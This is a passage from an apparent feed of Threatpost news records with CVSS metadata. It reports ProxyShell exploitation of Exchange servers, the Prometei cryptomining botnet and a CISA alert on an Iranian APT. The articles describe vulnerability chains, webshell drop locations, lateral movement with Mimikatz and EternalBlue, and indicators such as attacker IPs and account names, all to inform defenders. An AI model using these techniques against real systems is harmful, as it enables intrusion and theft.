On Monday, the SANS Internet Storm Center\u2019s Jan Kopriva [reported](<https://isc.sans.edu/forums/diary/ProxyShell+how+many+Exchange+servers+are+affected+and+where+are+they/27732/>) that he found more than 30,000 vulnerable Exchange servers via a Shodan scan and that any threat actor worthy of that title would find it a snap to pull off, given how much information is available.\n\nGoing by calculations tweeted by security researcher Kevin Beaumont, this means that, between ProxyLogon and ProxyShell, \u201cjust under 50 percent of internet-facing Exchange servers\u201d are currently vulnerable to exploitation, according to a Shodan search.\n\n> Breakdown of Exchange servers on Shodan vulnerable to ProxyShell or ProxyLogon, it's just under 50% of internet facing Exchange servers. [pic.twitter.com/3samyNHBpB](<https://t.co/3samyNHBpB>)\n> \n> \u2014 Kevin Beaumont (@GossiTheDog) [August 13, 2021](<https://twitter.com/GossiTheDog/status/1426207905779527682?ref_src=twsrc%5Etfw>)\n\nOn the plus side, Microsoft has already released patches for all of the vulnerabilities in question, and, cross your fingers, \u201cchances are that most organizations that take security at least somewhat seriously have already applied the patches,\u201d Kopriva wrote.\n\nThe vulnerabilities affect Exchange Server 2013, 2016 and 2019.\n\nOn Thursday, Beaumont and NCC Group\u2019s vulnerability researcher Rich Warren disclosed that threat actors have exploited their Microsoft Exchange honeypots using the ProxyShell vulnerability.\n\n\u201cStarted to see in the wild exploit attempts against our honeypot infrastructure for the Exchange ProxyShell vulnerabilities,\u201d Warren tweeted, along with a screen capture of the code for a c# aspx webshell dropped in the /aspnet_client/ directory.\n\n> Started to see in the wild exploit attempts against our 
honeypot infrastructure for the Exchange ProxyShell vulnerabilities. This one dropped a c# aspx webshell in the /aspnet_client/ directory: [pic.twitter.com/XbZfmQQNhY](<https://t.co/XbZfmQQNhY>)\n> \n> \u2014 Rich Warren (@buffaloverflow) [August 12, 2021](<https://twitter.com/buffaloverflow/status/1425831100157349890?ref_src=twsrc%5Etfw>)\n\nBeaumont [tweeted](<https://twitter.com/GossiTheDog/status/1425844380376735746>) that he was seeing the same and connected it to Tsai\u2019s talk: \u201cExchange ProxyShell exploitation wave has started, looks like some degree of spraying. Random shell names for access later. Uses foo name from @orange_8361\u2019s initial talk.\u201d\n\n> Exchange ProxyShell exploitation wave has started, looks like some degree of spraying. Random shell names for access later. Uses foo name from [@orange_8361](<https://twitter.com/orange_8361?ref_src=twsrc%5Etfw>)'s initial talk.\n> \n> \u2014 Kevin Beaumont (@GossiTheDog) [August 12, 2021](<https://twitter.com/GossiTheDog/status/1425844380376735746?ref_src=twsrc%5Etfw>)\n\n## Dangerous Skating on the New Attack Surface\n\nIn [a post](<https://devco.re/blog/2021/08/06/a-new-attack-surface-on-MS-exchange-part-1-ProxyLogon/>) on Sunday, Tsai recounted the in-the-wild ProxyLogon proof of concept that Devco reported to MSRC in late February, explaining that it made the researchers \u201cas curious as everyone after eliminating the possibility of leakage from our side through a thorough investigation.\n\n\u201cWith a clearer timeline appearing and more discussion occurring, it seems like this is not the first time that something like this happened to Microsoft,\u201d he continued. Mail server is both a highly valuable asset and a seemingly irresistible target for attackers, given that it holds businesses\u2019 confidential secrets and corporate data.\n\n\u201cIn other words, controlling a mail server means controlling the lifeline of a company,\u201d Tsai explained. 
\u201cAs the most common-use email solution, Exchange Server has been the top target for hackers for a long time. Based on our research, there are more than four hundred thousand Exchange Servers exposed on the Internet. Each server represents a company, and you can imagine how horrible it is while a severe vulnerability appeared in Exchange Server.\u201d\n\nDuring his Black Hat presentation, Tsai explained that the new attack surface his team discovered is based on \u201ca significant change in Exchange Server 2013, where the fundamental protocol handler, Client Access Service (CAS), splits into frontend and backend\u201d \u2013 a change that incurred \u201cquite an amount of design\u201d and yielded eight vulnerabilities, consisting of server-side bugs, client-side bugs and crypto bugs.\n\nHe chained the bugs into three attack vectors: The now-infamous [ProxyLogon](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>) that induced [patching frenzy](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) a few months back, the ProxyShell vector that\u2019s now under active attack, and another vector called ProxyOracle.\n\n\u201cThese attack vectors enable any unauthenticated attacker to uncover plaintext passwords and even execute arbitrary code on Microsoft Exchange Servers through port 443, which is exposed to the Internet by about 400,000 Exchange Servers,\u201d according to the presentation\u2019s introduction.\n\nThe three Exchange vulnerabilities, all of which are [patched](<https://threatpost.com/microsoft-crushes-116-bugs/167764/>), that Tsai chained for the ProxyShell attack:\n\n * [CVE-2021-34473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>) \u2013 Pre-auth path confusion leads to ACL bypass\n * [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>) \u2013 Elevation of privilege on Exchange PowerShell backend\n * 
[CVE-2021-31207](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>) \u2013 Post-auth arbitrary file-write leads to RCE\n\nProxyShell earned the Devcore team a $200,000 bounty after they used the bugs to take over an Exchange server at the [Pwn2Own 2021](<https://twitter.com/thezdi/status/1379467992862449664>) contest in April.\n\nDuring his Black Hat talk, Tsai said that he discovered the Exchange vulnerabilities when targeting the Microsoft Exchange CAS attack surface. As Tsai explained, CAS is \u201ca fundamental component\u201d of Exchange.\n\nHe referred to [Microsoft\u2019s documentation](<https://docs.microsoft.com/en-us/exchange/architecture/architecture?view=exchserver-2019>), which states:\n\n\u201cMailbox servers contain the Client Access services that accept client connections for all protocols. These frontend services are responsible for routing or proxying connections to the corresponding backend services on a Mailbox server.\u201d\n\n\u201cFrom the narrative you could realize the importance of CAS, and you could imagine how critical it is when bugs are found in such infrastructure. CAS was where we focused on, and where the attack surface appeared,\u201d Tsai wrote. \u201cCAS is the fundamental component in charge of accepting all the connections from the client side, no matter if it\u2019s HTTP, POP3, IMAP or SMTP, and proxies the connections to the corresponding backend service.\u201d\n\n## ProxyShell Just the \u2018Tip of the Iceberg\u2019\n\nOut of all the bugs he found in the new attack surface, Tsai dubbed [CVE-2020-0688](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) (an RCE vulnerability that involved a hard-coded cryptographic key in Exchange) the \u201cmost surprising.\u201d\n\n\u201cWith this hard-coded key, an attacker with low privilege can take over the whole Exchange Server,\u201d he wrote. 
\u201cAnd as you can see, even in 2020, a silly, hard-coded cryptographic key could still be found in an essential software like Exchange. This indicated that Exchange is lacking security reviews, which also inspired me to dig more into the Exchange security.\u201d\n\nBut the \u201cmost interesting\u201d flaw is [CVE-2018-8581](<https://www.zerodayinitiative.com/blog/2018/12/19/an-insincere-form-of-flattery-impersonating-users-on-microsoft-exchange>), he said, which was disclosed by someone who cooperated with ZDI. Though it\u2019s a \u201csimple\u201d server-side request forgery (SSRF), it could be combined with NTLM Relay, enabling the attacker to \u201cturn a boring SSRF into [something really fancy,\u201d Tsai said.](<https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/>)\n\nFor example, it could \u201cdirectly control the whole Domain Controller through a low-privilege account,\u201d Tsai said.\n\n## Autodiscover Figures into ProxyShell\n\nAs [BleepingComputer](<https://www.bleepingcomputer.com/news/microsoft/microsoft-exchange-servers-are-getting-hacked-via-proxyshell-exploits/>) reported, during his presentation, Tsai explained that one of the components of the ProxyShell attack chain targets the Microsoft Exchange [Autodiscover](<https://docs.microsoft.com/en-us/exchange/architecture/client-access/autodiscover?view=exchserver-2019>) service: a service that eases configuration and deployment by providing clients access to Exchange features with minimal user input.\n\nTsai\u2019s talk evidently triggered a wave of scanning for the vulnerabilities by attackers.\n\nAfter watching the presentation, other security researchers replicated the ProxyShell exploit. 
The day after Tsai\u2019s presentation, last Friday, PeterJson and Nguyen Jang [published](<https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1>) more detailed technical information about their successful reproduction of the exploit.\n\nSoon after, Beaumont [tweeted](<https://twitter.com/GossiTheDog/status/1422178411385065476?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1422178411385065476%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fwww.bleepingcomputer.com%2Fnews%2Fmicrosoft%2Fmicrosoft-exchange-servers-scanned-for-proxyshell-vulnerability-patch-now%2F>) about a threat actor who was probing his Exchange honeypot using the [Autodiscover service](<https://docs.microsoft.com/en-us/exchange/architecture/client-access/autodiscover?view=exchserver-2019>). As of yesterday, Aug. 12, those servers were being targeted using autodiscover.json, he tweeted.\n\nAs of Thursday, ProxyShell was dropping a 265K webshell \u2013 the minimum file size that can be created via ProxyShell due to its use of the Mailbox Export function of Exchange Powershell to create PST files \u2013 to the \u2018c:\\inetpub\\wwwroot\\aspnet_client\\\u2019 folder. 
Warren shared a sample with BleepingComputer that showed that the webshells consist of \u201ca simple authentication-protected script that the threat actors can use to upload files to the compromised Microsoft Exchange server.\u201d\n\nBad Packets told the outlet that as of Thursday, it was seeing threat actors scanning for vulnerable ProxyShell devices from IP addresses in the U.S., Iran and the Netherlands, using the domains @abc.com and @1337.com, from the known addresses 3.15.221.32 and 194.147.142.0/24.\n\nWorried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 
17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-13T18:56:27", "type": "threatpost", "title": "Exchange Servers Under Active Attack via ProxyShell Bugs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8581", "CVE-2020-0688", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-13T18:56:27", "id": "THREATPOST:4B2E19CAF27A3EFBCB2F777C6E528317", "href": "https://threatpost.com/exchange-servers-attack-proxyshell/168661/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-23T17:33:27", "description": "A heretofore little-seen botnet dubbed Prometei is taking a page from advanced persistent threat (APT) cyberattackers: The malware is exploiting two of the Microsoft Exchange vulnerabilities collectively known as ProxyLogon, in order to drop a Monero cryptominer on its targets.\n\nIt\u2019s also highly complex and sophisticated, researchers noted. 
While cryptojacking is its current game, Cybereason researchers warned that Prometei (the Russian word for Prometheus, the Titan god of fire from Greek mythology) gives attackers complete control over infected machines, which makes it capable of doing a wide range of damage.\n\n\u201cIf they wish to, they can steal information, infect the endpoints with other malware or even collaborate with ransomware gangs by selling the access to the infected endpoints,\u201d Cybereason researcher Lior Rochberger noted in [an analysis](<https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities>) released Thursday. \u201c[And] since cryptomining can be resource-hogging, it can affect the performance and stability of critical servers and endpoints, ultimately affecting business continuity.\u201d\n\nThe report noted that Cybereason has recently seen wide swathes of Prometei attacks on a variety of industries, including construction, finance, insurance, manufacturing, retail, travel and utilities. Geographically speaking, it has been observed infecting networks in the U.S., U.K. and many other European countries, as well as countries in South America and East Asia. 
It was also observed that the threat actors appear to be explicitly avoiding infecting targets in former Soviet-bloc countries.\n\n\u201cThe victimology is quite random and opportunistic rather than highly targeted, which makes it even more dangerous and widespread,\u201d Rochberger said.\n\n## **Exploiting Microsoft Exchange Security Bugs**\n\n[ProxyLogon](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) consists of four flaws that can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment, such as the [deployment of ransomware](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>), or as in this case, [cryptominers](<https://threatpost.com/attackers-target-proxylogon-cryptojacker/165418/>).\n\nMicrosoft last month warned that the bugs were being [actively exploited](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) by the Hafnium advanced persistent threat (APT); after that, other researchers said that [10 or more additional APTs](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) were also using them.\n\nWhen it comes to Prometei, researchers have observed attacks against companies in North America making use of the ProxyLogon bugs tracked as CVE-2021-27065 and CVE-2021-26858. Both are post-authentication arbitrary file-write vulnerabilities in Exchange; once authenticated with an Exchange server, attackers could write a file to any path on the server \u2013 thus achieving RCE.\n\nThe attackers use the vulnerabilities to install and execute the China Chopper web shell, according to Rochberger. 
They then use [China Chopper to launch a PowerShell](<https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/>), which in turn downloads a payload from an attacker-controlled URL. That payload is then saved and executes, which ultimately starts the Prometei botnet execution.\n\n\u201cPrometei is a modular and multistage cryptocurrency botnet that was first discovered in July 2020 which has both Windows and Linux versions,\u201d explained Rochberger, who added that the botnet could extend back to 2016. \u201cThe latest versions of Prometei now provide the attackers with a sophisticated and stealthy backdoor that supports a wide range of tasks that make mining Monero coins the least of the victims\u2019 concerns.\u201d\n\n## **Prometei Under the Hood**\n\nThe first module of the botnet, zsvc.exe, copies itself into C:\\Windows with the name \u201csqhost.exe,\u201d and then creates a firewall rule that will allow sqhost.exe to create connections over HTTP, according to the research. It also sets a registry key for persistence, and creates several other registry keys for later command-and-control (C2) communications by additional modules.\n\n\u201cSqhost.exe is the main bot module, complete with backdoor capabilities that support a wide range of commands,\u201d according to the analysis. \u201cSqhost.exe is able to parse the prometei.cgi file from four different hardcoded C2 servers. The file contains the command to be executed on the machine. The commands can be used as standalone native OS commands\u2026or can be used to interact with the other modules of the malware.\u201d\n\nIt also controls the XMRig cryptominer that the malware installs on the machine, Cybereason noted. 
The commands on offer include the ability to execute a program or open a file; start or stop the mining process; download files; gather system information; check if a specific port is open; search for specific files or extensions; and update the malware \u2013 among other things.\n\n\u201cThe malware authors are able to add more modules and expand their capabilities easily, and potentially even shift to another payload objective, more destructive than just mining Monero,\u201d Rochberger warned.\n\nThe report noted that the execution of the malware also includes two other \u201ctree processes:\u201d cmd.exe and wmic.exe.\n\nWmic.exe is used to perform reconnaissance commands, including gathering the last time the machine was booted up, the machine model and more. Meanwhile Cmd.exe is used to block certain IP addresses from communicating with the machine.\n\n\u201cWe assess that those IP addresses are used by other malware, potentially miners, and the attackers behind Prometei wanted to ensure that all the resources of the network are available just for them,\u201d Rochberger explained.\n\n## **Lateral Malware Movement: Additional Malicious Modules**\n\nPrometei uses different techniques and tools, ranging from Mimikatz to the EternalBlue and BlueKeep exploits, along with other tools that all work together to propagate across the network, according to the analysis. 
To carry all of this out, the main botnet module downloads additional modules, including four main components:\n\n * exe\n * exe and an archived file, Netwalker.7z (7zip is used to extract the files in the archive)\n * exe\n * exe\n\nExchdefender masquerades as a made-up program called \u201cMicrosoft Exchange Defender.\u201d It constantly checks the files within a program files directory known to be used to host web shells, looking for one file in particular, according to Cybereason.\n\n\u201cThe malware is specifically interested in the file \u2018ExpiredPasswords.aspx\u2019 which was reported to be the name used to obscure the HyperShell backdoor used by [APT34 (aka OilRig)](<https://threatpost.com/oilrig-apt-unique-backdoor/157646/>),\u201d Rochberger said. \u201cIf the file exists, the malware immediately deletes it. Our assessment is that this tool is used to \u201cprotect\u201d the compromised Exchange Server by deleting potential WebShells so Prometei will remain the only malware using its resources.\u201d\n\nThe Netwalker.7z archive meanwhile is password-protected, using the password \u201chorhor123.\u201d The archive contains the following files: Nethelper2.exe, Nethelper4.exe, Windrlver.exe, a few DLLs, a copy of RdpcIip.exe and a few DLLs used by the bot components.\n\nRdpcIip.exe is a key component of the malware, used for harvesting credentials and spreading laterally across the network, Rochberger explained. It also tries to propagate within the network environment by brute-forcing usernames and passwords using a built-in list of common combinations, he said.\n\nIf that doesn\u2019t work, it turns to the [SMB shared-drive exploit EternalBlue](<https://threatpost.com/nsas-eternalblue-exploit-ported-to-windows-10/126087/>) to execute shellcode for installing the main bot module Sqhost.exe. To use the exploit, the malware downgrades the SMB protocol to SMB1, which is vulnerable to it. 
Cybereason also observed the module using the [Remote Desktop Protocol (RDP) exploit BlueKeep](<https://threatpost.com/bluekeep-attacks-have-arrived-are-initially-underwhelming/149829/>).\n\nInterestingly, RdpcIip also can coordinate other components of the bot such as Windlver.exe, which is an OpenSSH and SSLib-based software that the attackers created so they can spread across the network using SSH, the report noted.\n\n\u201c[RdpcIip] has huge (trust us, huge) functionality with different branches with the main purpose being to interact with other components of the malware and make them work all together,\u201d Rochberger said.\n\nAnd finally, Miwalk.exe is a customized version of the Mimikatz credential-finding tool that RdpcIip.exe launches. The output is saved in text files and used by RdpcIip as it tries to validate the credentials and spread, according to the analysis.\n\n## **Taking a Page from APTs**\n\nThe group behind Prometei is financially motivated and operated by Russian-speaking individuals but is not backed by a nation-state, according to Cybereason. Nonetheless, the malware\u2019s sophistication and rapid incorporation of ProxyLogon exploits shows advanced capabilities that could make the botnet a serious danger in terms of espionage, information theft, follow-on malware and more, Rochberger warned.\n\n\u201cThreat actors in the cybercrime community continue to adopt APT-like techniques and improve the efficiency of their operations,\u201d he explained. \u201cPrometei is a complex and multistage botnet that, due to its stealth and wide range of capabilities, puts the compromised network at great risk\u2026The threat actors rode the wave of the recently discovered flaws and exploited them in order to penetrate targeted networks. 
We anticipate continued evolution of the advanced techniques being used by different threat actors for different purposes, including cybercrime groups.\u201d\n", "cvss3": {}, "published": "2021-04-23T17:15:23", "type": "threatpost", "title": "Prometei Botnet Could Fire Up APT-Style Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-04-23T17:15:23", "id": "THREATPOST:1B1BF3F545C6375A88CD201E2A55DF23", "href": "https://threatpost.com/prometei-botnet-apt-attacks/165574/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-18T02:26:11", "description": "A state-backed Iranian threat actor has been using multiple CVEs \u2013 including both serious Fortinet vulnerabilities for months and a Microsoft Exchange ProxyShell weakness for weeks \u2013 looking to gain a foothold within networks before moving laterally and launching [BitLocker](<https://threatpost.com/hades-ransomware-connections-hafnium/165069/>) ransomware and other nastiness.\n\nA joint [advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/11/17/iranian-government-sponsored-apt-cyber-actors-exploiting-microsoft>) published by CISA on Wednesday was meant to highlight the ongoing, malicious cyber assault, which has been tracked by the FBI, the U.S. 
Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC) and the United Kingdom\u2019s National Cyber Security Centre (NCSC). All of the security bodies have traced the attacks to an Iranian government-sponsored advanced persistent threat (APT).\n\nThe Iranian APT has been exploiting Fortinet vulnerabilities since at least March 2021 and a Microsoft Exchange ProxyShell vulnerability since at least October 2021, according to the alert. The weaknesses are granting the attackers initial access to systems that\u2019s then leading to follow-on operations including ransomware, data exfiltration or encryption, and extortion.\n\nThe APT has used the same Microsoft Exchange vulnerability in Australia.\n\n## CISA Warning Follows Microsoft Report on Six Iranian Threat Groups\n\nCISA\u2019s warning came on the heels of [an analysis](<https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/>) of the evolution of Iranian threat actors released by Microsoft\u2019s Threat Intelligence Center (MSTIC) on Tuesday.\n\nMSTIC researchers called out three trends they\u2019ve seen emerge since they started tracking six increasingly sophisticated Iranian APT groups in September 2020:\n\n * They are increasingly utilizing ransomware to either collect funds or disrupt their targets.\n * They are more patient and persistent while engaging with their targets.\n * While Iranian operators are more patient and persistent with their social engineering campaigns, they continue to employ aggressive brute force attacks on their targets.\n\nThey\u2019ve seen ransomware attacks coming in waves, averaging every six to eight weeks, as shown in the timeline below.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/17104422/Fig1b-ransomware-timeline.jpg>)\n\nTimeline of ransomware attacks by Iranian threat actors. 
Source: MSTIC.\n\nIn keeping with what CISA described on Wednesday, MSTIC has seen the Iran-linked [Phosphorous group](<https://threatpost.com/apt-ta453-siphons-intel-mideast/167715/>) \u2013 aka a number of names, including Charming Kitten, TA453, APT35, Ajax Security Team, NewsBeef and Newscaster \u2013 globally target the Exchange and Fortinet flaws \u201cwith the intent of deploying ransomware on vulnerable networks.\u201d\n\nThe researchers pointed to a recent blog post by the [DFIR Report](<https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/>) describing a similar intrusion, in which the attackers exploited vulnerabilities in on-premise Exchange Servers to compromise their targets\u2019 environments and encrypt systems via BitLocker ransomware: activity that MSTIC also attributed to Phosphorous.\n\n## No Specific Sectors Targeted\n\nThe threat actors covered in CISA\u2019s alert aren\u2019t targeting specific sectors. Rather, they\u2019re focused on exploiting those irresistible Fortinet and Exchange vulnerabilities.\n\nThe alert advised that the APT actors are \u201cactively targeting a broad range of victims across multiple U.S. 
critical infrastructure sectors, including the Transportation Sector and the Healthcare and Public Health Sector, as well as Australian organizations.\u201d\n\n## Malicious Activity\n\nSince March, the Iranian APT actors have been scanning devices on ports 4443, 8443 and 10443 for the much-exploited, serious Fortinet FortiOS vulnerability tracked as [CVE-2018-13379](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) \u2013 a path-traversal issue in Fortinet FortiOS, where the SSL VPN web portal allows an unauthenticated attacker to download system files via specially crafted HTTP resource requests.\n\nIt\u2019s d\u00e9j\u00e0 vu all over again: In April, CISA had [warned](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) about those same ports being scanned by cyberattackers looking for the Fortinet flaws. In its April alert ([PDF](<https://www.ic3.gov/media/news/2021/210402.pdf>)), CISA said that it looked like the APT actors were going after access \u201cto multiple government, commercial, and technology services networks.\u201d\n\nThat\u2019s what APT actors do, CISA said: They exploit critical vulnerabilities like the Fortinet CVEs \u201cto conduct distributed denial-of-service (DDoS) attacks, ransomware attacks, structured query language (SQL) injection attacks, spearphishing campaigns, website defacements, and disinformation campaigns.\u201d\n\nCVE-2018-13379 was just one of three security vulnerabilities in the Fortinet SSL VPN that the security bodies had seen being used to gain a foothold within networks before moving laterally and carrying out recon, as the FBI and CISA said in the April alert.\n\nAccording to Wednesday\u2019s report, the APT actors are also enumerating devices for the remaining pair of FortiOS vulnerabilities in the trio CISA saw being exploited in March, which are:\n\n * [CVE-2020-12812](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12812>), an improper-authentication 
vulnerability in SSL VPN in FortiOS that could allow a user to log in successfully without being prompted for the second factor of authentication (FortiToken) if they changed the case of their username, and\n * [CVE-2019-5591](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5591>): a default-configuration vulnerability in FortiOS that could allow an unauthenticated attacker on the same subnet to intercept sensitive information by impersonating the LDAP server.\n\n\u201cThe Iranian Government-sponsored APT actors likely exploited these vulnerabilities to gain access to vulnerable networks,\u201d according to Wednesday\u2019s alert.\n\nIn May, the same Iranian actors also exploited a Fortinet FortiGate firewall to gain access to a U.S. municipal government\u2019s domain. \u201cThe actors likely created an account with the username \u201celie\u201d to further enable malicious activity,\u201d CISA said, pointing to a previous FBI flash alert ([PDF](<https://www.ic3.gov/media/news/2021/210527.pdf>)) on the incident.\n\nIn June, the same APT actors exploited another FortiGate security appliance to access environmental control networks associated with a U.S. children\u2019s hospital after likely leveraging a server assigned to IP addresses 91.214.124[.]143 and 162.55.137[.]20: addresses that the FBI and CISA have linked with Iranian government cyber activity. They did it to \u201cfurther enable malicious activity against the hospital\u2019s network,\u201d CISA explained.\n\n\u201cThe APT actors accessed known user accounts at the hospital from IP address 154.16.192[.]70, which FBI and CISA judge is associated with government of Iran offensive cyber activity,\u201d CISA said.\n\n## Yet More Exchange ProxyShell Attacks\n\nFinally, the gang turned to exploiting a Microsoft Exchange ProxyShell vulnerability \u2013 CVE-2021-34473 \u2013 last month, in order to, again, gain initial access to systems in advance of follow-on operations. 
ACSC believes that the group has also used [CVE-2021-34473](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473>) in Australia.\n\nProxyShell is a name given to an attack that chains a trio of vulnerabilities together (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), to enable unauthenticated attackers to perform remote code execution (RCE) and to snag plaintext passwords.\n\nThe attack was outlined in a presentation ([PDF](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>)) given by Devcore principal security researcher [Orange Tsai](<https://twitter.com/orange_8361>) at Black Hat in April. In it, Tsai disclosed an entirely new attack surface in Exchange, and a [barrage](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) of [attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) soon followed. August was glutted with reports of threat actors exploiting ProxyShell to launch [webshell attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>), as well as to deliver [LockFile ransomware](<https://pbs.twimg.com/media/E9TmPo6XMAYCnO-?format=jpg&name=4096x4096>).\n\n## Indications of Compromise\n\n[CISA\u2019s detailed alert](<https://us-cert.cisa.gov/ncas/alerts/aa21-321a>) gives a laundry list of tactics and techniques being used by the Iran-linked APT.\n\nOne of many indicators of compromise (IOC) that\u2019s been spotted are new user accounts that may have been created by the APT on domain controllers, servers, workstations and active directories [[T1136.001](<https://attack.mitre.org/versions/v10/techniques/T1136/001>), [T1136.002](<https://attack.mitre.org/versions/v10/techniques/T1136/002>)].\n\n\u201cSome of these accounts appear to have been created to look similar to other existing accounts on the network, so specific account names may vary per organization,\u201d CISA 
advised.\n\nBesides unrecognized user accounts or accounts established to masquerade as existing accounts, these account usernames may be associated with the APT\u2019s activity:\n\n * Support\n * Help\n * elie\n * WADGUtilityAccount\n\nIn its Tuesday analysis, MSTIC researchers cautioned that Iranian operators are flexible, patient and adept, \u201c[having] adapted both their strategic goals and tradecraft.\u201d Over time, they said, the operators have evolved into \u201cmore competent threat actors capable of conducting a full spectrum of operations, including:\n\n * Information operations\n * Disruption and destruction\n * Support to physical operations\n\nSpecifically, these threat actors have proved capable of all these operations, researchers said:\n\n * Deploy ransomware\n * Deploy disk wipers\n * Deploy mobile malware\n * Conduct phishing attacks\n * Conduct password spray attacks\n * Conduct mass exploitation attacks\n * Conduct supply chain attacks\n * Cloak C2 communications behind legitimate cloud services\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-17T17:04:01", "type": "threatpost", "title": "Exchange, Fortinet Flaws Being Exploited by Iranian APT, CISA Warns", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-11-17T17:04:01", "id": "THREATPOST:604B67FD6EFB0E72DDD87DF07C8F456D", "href": "https://threatpost.com/exchange-fortinet-exploited-iranian-apt-cisa/176395/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, 
{"lastseen": "2021-03-10T13:10:52", "description": "Microsoft has released its regularly scheduled March Patch Tuesday updates, which address 89 security vulnerabilities overall.\n\nIncluded in the slew are 14 critical flaws and 75 important-severity flaws. 
